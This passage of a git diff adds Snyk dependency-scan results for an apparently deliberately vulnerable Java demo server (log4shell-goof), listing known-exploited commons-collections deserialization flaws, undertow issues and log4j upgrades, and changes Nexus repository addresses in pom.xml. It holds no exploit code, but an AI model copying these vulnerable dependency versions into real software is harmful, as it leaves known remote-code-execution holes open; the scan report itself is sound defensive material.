+ false,
+ "commons-collections:commons-collections@3.2.2"
+ ],
+ "isUpgradable": true,
+ "isPatchable": false,
+ "name": "commons-collections:commons-collections",
+ "version": "3.1"
+ },
+ {
+ "id": "SNYK-JAVA-COMMONSCOLLECTIONS-6056408",
+ "title": "Deserialization of Untrusted Data",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[3.0,3.2.2)"
+ ]
+ },
+ "exploit": "High",
+ "fixedIn": [
+ "3.2.2"
+ ],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "critical",
+ "cvssScore": 9.8,
+ "functions": [],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "commons-collections:commons-collections",
+ "references": [
+ {
+ "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/",
+ "title": "FoxGloveSecurity Blog"
+ },
+ {
+ "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611",
+ "title": "GitHub Commit"
+ },
+ {
+ "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580",
+ "title": "Jira Issue"
+ },
+ {
+ "url": "https://github.com/ianxtianxt/CVE-2015-7501",
+ "title": "PoC"
+ },
+ {
+ "url": "https://www.exploit-db.com/exploits/46628",
+ "title": "Exploit DB"
+ },
+ {
+ "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
+ "title": "CISA - Known Exploited Vulnerabilities"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "NVD",
+ "severity": "critical",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "cvssV3BaseScore": 9.8,
+ "modificationTime": "2024-03-11T09:54:13.273677Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O",
+ "assigner": "Snyk",
+ "severity": "critical",
+ "baseScore": 9.8,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-06T14:09:40.088365Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "assigner": "NVD",
+ "severity": "critical",
+ "baseScore": 9.8,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-11T09:54:13.273677Z"
+ }
+ ],
+ "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-7501](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n- [Exploit DB](https://www.exploit-db.com/exploits/46628)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n",
+ "epssDetails": {
+ "percentile": "0.99697",
+ "probability": "0.96729",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2015-4852"
+ ],
+ "CWE": [
+ "CWE-502"
+ ]
+ },
+ "packageName": "commons-collections:commons-collections",
+ "proprietary": false,
+ "creationTime": "2023-11-14T13:41:26.946764Z",
+ "functions_new": [],
+ "alternativeIds": [],
+ "disclosureTime": "2015-11-06T16:51:56Z",
+ "exploitDetails": {
+ "sources": [
+ "CISA",
+ "ExploitDB",
+ "Snyk"
+ ],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "High",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Attacked",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "commons-collections",
+ "artifactId": "commons-collections"
+ },
+ "publicationTime": "2015-11-06T16:51:56Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-06-03T08:53:26.834525Z",
+ "socialTrendAlert": false,
+ "severityWithCritical": "critical",
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "commons-collections:commons-collections@3.1"
+ ],
+ "upgradePath": [
+ false,
+ "commons-collections:commons-collections@3.2.2"
+ ],
+ "isUpgradable": true,
+ "isPatchable": false,
+ "name": "commons-collections:commons-collections",
+ "version": "3.1"
+ }
+ ],
+ "ok": false,
+ "dependencyCount": 13,
+ "org": "austin.doll",
+ "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\n",
+ "isPrivate": true,
+ "licensesPolicy": {
+ "severities": {},
+ "orgLicenseRules": {
+ "AGPL-1.0": {
+ "licenseType": "AGPL-1.0",
+ "severity": "high",
+ "instructions": ""
+ },
+ "AGPL-3.0": {
+ "licenseType": "AGPL-3.0",
+ "severity": "high",
+ "instructions": ""
+ },
+ "Artistic-1.0": {
+ "licenseType": "Artistic-1.0",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "Artistic-2.0": {
+ "licenseType": "Artistic-2.0",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "CDDL-1.0": {
+ "licenseType": "CDDL-1.0",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "CPOL-1.02": {
+ "licenseType": "CPOL-1.02",
+ "severity": "high",
+ "instructions": ""
+ },
+ "EPL-1.0": {
+ "licenseType": "EPL-1.0",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "GPL-2.0": {
+ "licenseType": "GPL-2.0",
+ "severity": "high",
+ "instructions": ""
+ },
+ "GPL-3.0": {
+ "licenseType": "GPL-3.0",
+ "severity": "high",
+ "instructions": ""
+ },
+ "LGPL-2.0": {
+ "licenseType": "LGPL-2.0",
+ "severity": "high",
+ "instructions": ""
+ },
+ "LGPL-3.0": {
+ "licenseType": "LGPL-3.0",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "MPL-1.1": {
+ "licenseType": "MPL-1.1",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "MPL-2.0": {
+ "licenseType": "MPL-2.0",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "MS-RL": {
+ "licenseType": "MS-RL",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "SimPL-2.0": {
+ "licenseType": "SimPL-2.0",
+ "severity": "high",
+ "instructions": ""
+ },
+ "LGPL-2.1": {
+ "licenseType": "LGPL-2.1",
+ "severity": "medium",
+ "instructions": ""
+ }
+ }
+ },
+ "packageManager": "maven",
+ "ignoreSettings": {
+ "adminOnly": false,
+ "reasonRequired": true,
+ "disregardFilesystemIgnores": false
+ },
+ "summary": "9 vulnerable dependency paths",
+ "remediation": {
+ "unresolved": [
+ {
+ "id": "SNYK-JAVA-IOUNDERTOW-7433721",
+ "title": "Memory Leak",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[0,]"
+ ]
+ },
+ "exploit": "Not Defined",
+ "fixedIn": [],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "low",
+ "cvssScore": 2.3,
+ "functions": [],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "io.undertow:undertow-core",
+ "references": [
+ {
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2274437",
+ "title": "Red Hat Bugzilla Bug"
+ },
+ {
+ "url": "https://access.redhat.com/errata/RHSA-2024:4392",
+ "title": "Red Hat Security Advisory"
+ },
+ {
+ "url": "https://github.com/undertow-io/undertow/blob/2.3.14.Final/core/src/main/java/io/undertow/Handlers.java%23L562",
+ "title": "Vulnerable Code"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "Red Hat",
+ "severity": "medium",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
+ "cvssV3BaseScore": 5.3,
+ "modificationTime": "2024-08-09T13:34:05.805132Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
+ "assigner": "Snyk",
+ "severity": "low",
+ "baseScore": 2.3,
+ "cvssVersion": "4.0",
+ "modificationTime": "2024-07-10T14:39:24.891744Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
+ "assigner": "Snyk",
+ "severity": "low",
+ "baseScore": 3.1,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-07-10T14:39:24.891744Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
+ "assigner": "Red Hat",
+ "severity": "medium",
+ "baseScore": 5.3,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-08-09T13:34:05.805132Z"
+ }
+ ],
+ "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Memory Leak when the `learning-push` handler is configured with the default `maxAge` of `-1`. An attacker who can send normal HTTP requests may consume excessive memory.\r\n\r\n## Workaround\r\nThis vulnerability can be avoided by setting a value for `maxAge` that is not `-1`.\n## Remediation\nThere is no fixed version for `io.undertow:undertow-core`.\n\n## References\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2274437)\n- [Red Hat Security Advisory](https://access.redhat.com/errata/RHSA-2024:4392)\n- [Vulnerable Code](https://github.com/undertow-io/undertow/blob/2.3.14.Final/core/src/main/java/io/undertow/Handlers.java#L562)\n",
+ "epssDetails": {
+ "percentile": "0.10901",
+ "probability": "0.00044",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2024-3653"
+ ],
+ "CWE": [
+ "CWE-401"
+ ],
+ "GHSA": [
+ "GHSA-ch7q-gpff-h9hp"
+ ]
+ },
+ "packageName": "io.undertow:undertow-core",
+ "proprietary": false,
+ "creationTime": "2024-07-10T07:43:42.505449Z",
+ "functions_new": [],
+ "alternativeIds": [],
+ "disclosureTime": "2024-07-09T00:31:40Z",
+ "exploitDetails": {
+ "sources": [],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "Not Defined",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Not Defined",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "io.undertow",
+ "artifactId": "undertow-core"
+ },
+ "publicationTime": "2024-07-10T14:39:24.891304Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-08-09T13:34:05.805132Z",
+ "socialTrendAlert": false,
+ "packagePopularityRank": 99,
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "io.undertow:undertow-core@2.3.14.Final"
+ ],
+ "upgradePath": [],
+ "isUpgradable": false,
+ "isPatchable": false,
+ "isPinnable": false,
+ "isRuntime": false,
+ "name": "io.undertow:undertow-core",
+ "version": "2.3.14.Final",
+ "severityWithCritical": "low"
+ },
+ {
+ "id": "SNYK-JAVA-IOUNDERTOW-7707751",
+ "title": "Race Condition",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[0,]"
+ ]
+ },
+ "exploit": "Not Defined",
+ "fixedIn": [],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "medium",
+ "cvssScore": 6.9,
+ "functions": [],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "io.undertow:undertow-core",
+ "references": [
+ {
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2305290",
+ "title": "Red Hat Bugzilla Bug"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "NVD",
+ "severity": "high",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
+ "cvssV3BaseScore": 7.5,
+ "modificationTime": "2024-08-24T01:12:26.277956Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N",
+ "assigner": "Snyk",
+ "severity": "medium",
+ "baseScore": 6.9,
+ "cvssVersion": "4.0",
+ "modificationTime": "2024-08-18T13:48:54.310148Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
+ "assigner": "Snyk",
+ "severity": "medium",
+ "baseScore": 6.5,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-08-18T13:48:54.310148Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
+ "assigner": "NVD",
+ "severity": "high",
+ "baseScore": 7.5,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-08-24T01:12:26.277956Z"
+ }
+ ],
+ "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Race Condition due to the reuse of the `StringBuilder` instance in the `ProxyProtocolReadListener` across multiple requests. An attacker can access data from previous requests or responses by exploiting the shared usage of the `StringBuilder`.\r\n\r\nThis vulnerability primarily results in errors and connection termination but creates a risk of data leakage in multi-request environments.\n## Remediation\nThere is no fixed version for `io.undertow:undertow-core`.\n\n## References\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2305290)\n",
+ "epssDetails": {
+ "percentile": "0.21908",
+ "probability": "0.00053",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2024-7885"
+ ],
+ "CWE": [
+ "CWE-362"
+ ]
+ },
+ "packageName": "io.undertow:undertow-core",
+ "proprietary": false,
+ "creationTime": "2024-08-18T13:26:45.492443Z",
+ "functions_new": [],
+ "alternativeIds": [],
+ "disclosureTime": "2024-08-07T00:00:00Z",
+ "exploitDetails": {
+ "sources": [],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "Not Defined",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Not Defined",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "io.undertow",
+ "artifactId": "undertow-core"
+ },
+ "publicationTime": "2024-08-18T13:44:23.906447Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-08-24T01:12:26.277956Z",
+ "socialTrendAlert": false,
+ "packagePopularityRank": 99,
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "io.undertow:undertow-core@2.3.14.Final"
+ ],
+ "upgradePath": [],
+ "isUpgradable": false,
+ "isPatchable": false,
+ "isPinnable": false,
+ "isRuntime": false,
+ "name": "io.undertow:undertow-core",
+ "version": "2.3.14.Final",
+ "severityWithCritical": "medium"
+ }
+ ],
+ "upgrade": {
+ "com.unboundid:unboundid-ldapsdk@3.1.1": {
+ "upgradeTo": "com.unboundid:unboundid-ldapsdk@4.0.5",
+ "upgrades": [
+ "com.unboundid:unboundid-ldapsdk@3.1.1"
+ ],
+ "vulns": [
+ "SNYK-JAVA-COMUNBOUNDID-32143"
+ ]
+ },
+ "commons-collections:commons-collections@3.1": {
+ "upgradeTo": "commons-collections:commons-collections@3.2.2",
+ "upgrades": [
+ "commons-collections:commons-collections@3.1",
+ "commons-collections:commons-collections@3.1",
+ "commons-collections:commons-collections@3.1"
+ ],
+ "vulns": [
+ "SNYK-JAVA-COMMONSCOLLECTIONS-30078",
+ "SNYK-JAVA-COMMONSCOLLECTIONS-472711",
+ "SNYK-JAVA-COMMONSCOLLECTIONS-6056408"
+ ]
+ },
+ "org.apache.logging.log4j:log4j-core@2.15.0": {
+ "upgradeTo": "org.apache.logging.log4j:log4j-core@2.17.1",
+ "upgrades": [
+ "org.apache.logging.log4j:log4j-core@2.15.0",
+ "org.apache.logging.log4j:log4j-core@2.15.0",
+ "org.apache.logging.log4j:log4j-core@2.15.0"
+ ],
+ "vulns": [
+ "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339",
+ "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524",
+ "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014"
+ ]
+ }
+ },
+ "patch": {},
+ "ignore": {},
+ "pin": {}
+ },
+ "filesystemPolicy": false,
+ "filtered": {
+ "ignore": [],
+ "patch": []
+ },
+ "uniqueCount": 9,
+ "projectName": "io.snyk:log4shell-server",
+ "displayTargetFile": "pom.xml",
+ "hasUnknownVersions": false,
+ "path": "/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server"
+}
diff --git a/log4shell-goof/log4shell-server/pom.xml b/log4shell-goof/log4shell-server/pom.xml
index a14f9f85e7..8fbe79ae82 100644
--- a/log4shell-goof/log4shell-server/pom.xml
+++ b/log4shell-goof/log4shell-server/pom.xml
@@ -4,18 +4,18 @@
io.snyk
log4shell-server
- 0.0.2-SNAPSHOT
+ 0.2.3
jar
privatedeps
snapshots
- http://52.207.113.17:8081/nexus/content/repositories/snapshots
+ http://54.161.19.223:8081/nexus/content/repositories/snapshots
privatedeps
- http://52.207.113.17:8081/nexus/content/repositories/releases
+ http://54.161.19.223:8081/nexus/content/repositories/releases
@@ -30,12 +30,12 @@
privatedeps
Aspose Java API
- http://52.207.113.17:8081/nexus/content/repositories/releases
+ http://35.171.191.69:8081/nexus/content/repositories/releases
2
All apart from Aspose
- http://52.207.113.17:8081/nexus/content/repositories/snapshots
+ http://35.171.191.69:8081/nexus/content/repositories/snapshots
diff --git a/log4shell-goof/log4shell-server/result.json b/log4shell-goof/log4shell-server/result.json
new file mode 100644
index 0000000000..037aece4a3
--- /dev/null
+++ b/log4shell-goof/log4shell-server/result.json
@@ -0,0 +1,1778 @@
+{
+ "vulnerabilities": [
+ {
+ "id": "SNYK-JAVA-COMMONSCOLLECTIONS-30078",
+ "title": "Deserialization of Untrusted Data",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[3.0,3.2.2)"
+ ]
+ },
+ "exploit": "High",
+ "fixedIn": [
+ "3.2.2"
+ ],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "critical",
+ "cvssScore": 9.8,
+ "functions": [
+ {
+ "version": [
+ "[3,3.2.2)"
+ ],
+ "functionId": {
+ "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java",
+ "className": "InvokerTransformer",
+ "functionName": "transform"
+ }
+ }
+ ],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "commons-collections:commons-collections",
+ "references": [
+ {
+ "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/",
+ "title": "FoxGloveSecurity Blog"
+ },
+ {
+ "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611",
+ "title": "GitHub Commit"
+ },
+ {
+ "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580",
+ "title": "Jira Issue"
+ },
+ {
+ "url": "https://github.com/ianxtianxt/CVE-2015-7501",
+ "title": "PoC"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "NVD",
+ "severity": "critical",
+ "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "cvssV3BaseScore": 9.8,
+ "modificationTime": "2024-03-11T09:46:27.924934Z"
+ },
+ {
+ "assigner": "Red Hat",
+ "severity": "high",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
+ "cvssV3BaseScore": 7.3,
+ "modificationTime": "2024-03-11T09:52:38.421377Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O",
+ "assigner": "Snyk",
+ "severity": "critical",
+ "baseScore": 9.8,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-06T14:09:40.078866Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "assigner": "NVD",
+ "severity": "critical",
+ "baseScore": 9.8,
+ "cvssVersion": "3.0",
+ "modificationTime": "2024-03-11T09:46:27.924934Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
+ "assigner": "Red Hat",
+ "severity": "high",
+ "baseScore": 7.3,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-11T09:52:38.421377Z"
+ }
+ ],
+ "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-4852](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-6056408)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n",
+ "epssDetails": {
+ "percentile": "0.88578",
+ "probability": "0.01844",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2015-7501"
+ ],
+ "CWE": [
+ "CWE-502"
+ ]
+ },
+ "packageName": "commons-collections:commons-collections",
+ "proprietary": false,
+ "creationTime": "2016-12-25T16:51:56Z",
+ "functions_new": [
+ {
+ "version": [
+ "[3,3.2.2)"
+ ],
+ "functionId": {
+ "className": "org.apache.commons.collections.functors.InvokerTransformer",
+ "functionName": "transform"
+ }
+ }
+ ],
+ "alternativeIds": [],
+ "disclosureTime": "2015-11-06T16:51:56Z",
+ "exploitDetails": {
+ "sources": [
+ "Snyk"
+ ],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "High",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Proof of Concept",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "commons-collections",
+ "artifactId": "commons-collections"
+ },
+ "publicationTime": "2015-11-06T16:51:56Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-03-11T09:52:38.421377Z",
+ "socialTrendAlert": false,
+ "severityWithCritical": "critical",
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "commons-collections:commons-collections@3.1"
+ ],
+ "upgradePath": [
+ false,
+ "commons-collections:commons-collections@3.2.2"
+ ],
+ "isUpgradable": true,
+ "isPatchable": false,
+ "name": "commons-collections:commons-collections",
+ "version": "3.1"
+ },
+ {
+ "id": "SNYK-JAVA-COMMONSCOLLECTIONS-472711",
+ "title": "Deserialization of Untrusted Data",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[,3.2.2)"
+ ]
+ },
+ "exploit": "Proof of Concept",
+ "fixedIn": [
+ "3.2.2"
+ ],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "medium",
+ "cvssScore": 5.6,
+ "functions": [
+ {
+ "version": [
+ "[3.1, 3.22)",
+ "[,3.0-dev2)"
+ ],
+ "functionId": {
+ "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java",
+ "className": "InvokerTransformer",
+ "functionName": ""
+ }
+ }
+ ],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "commons-collections:commons-collections",
+ "references": [
+ {
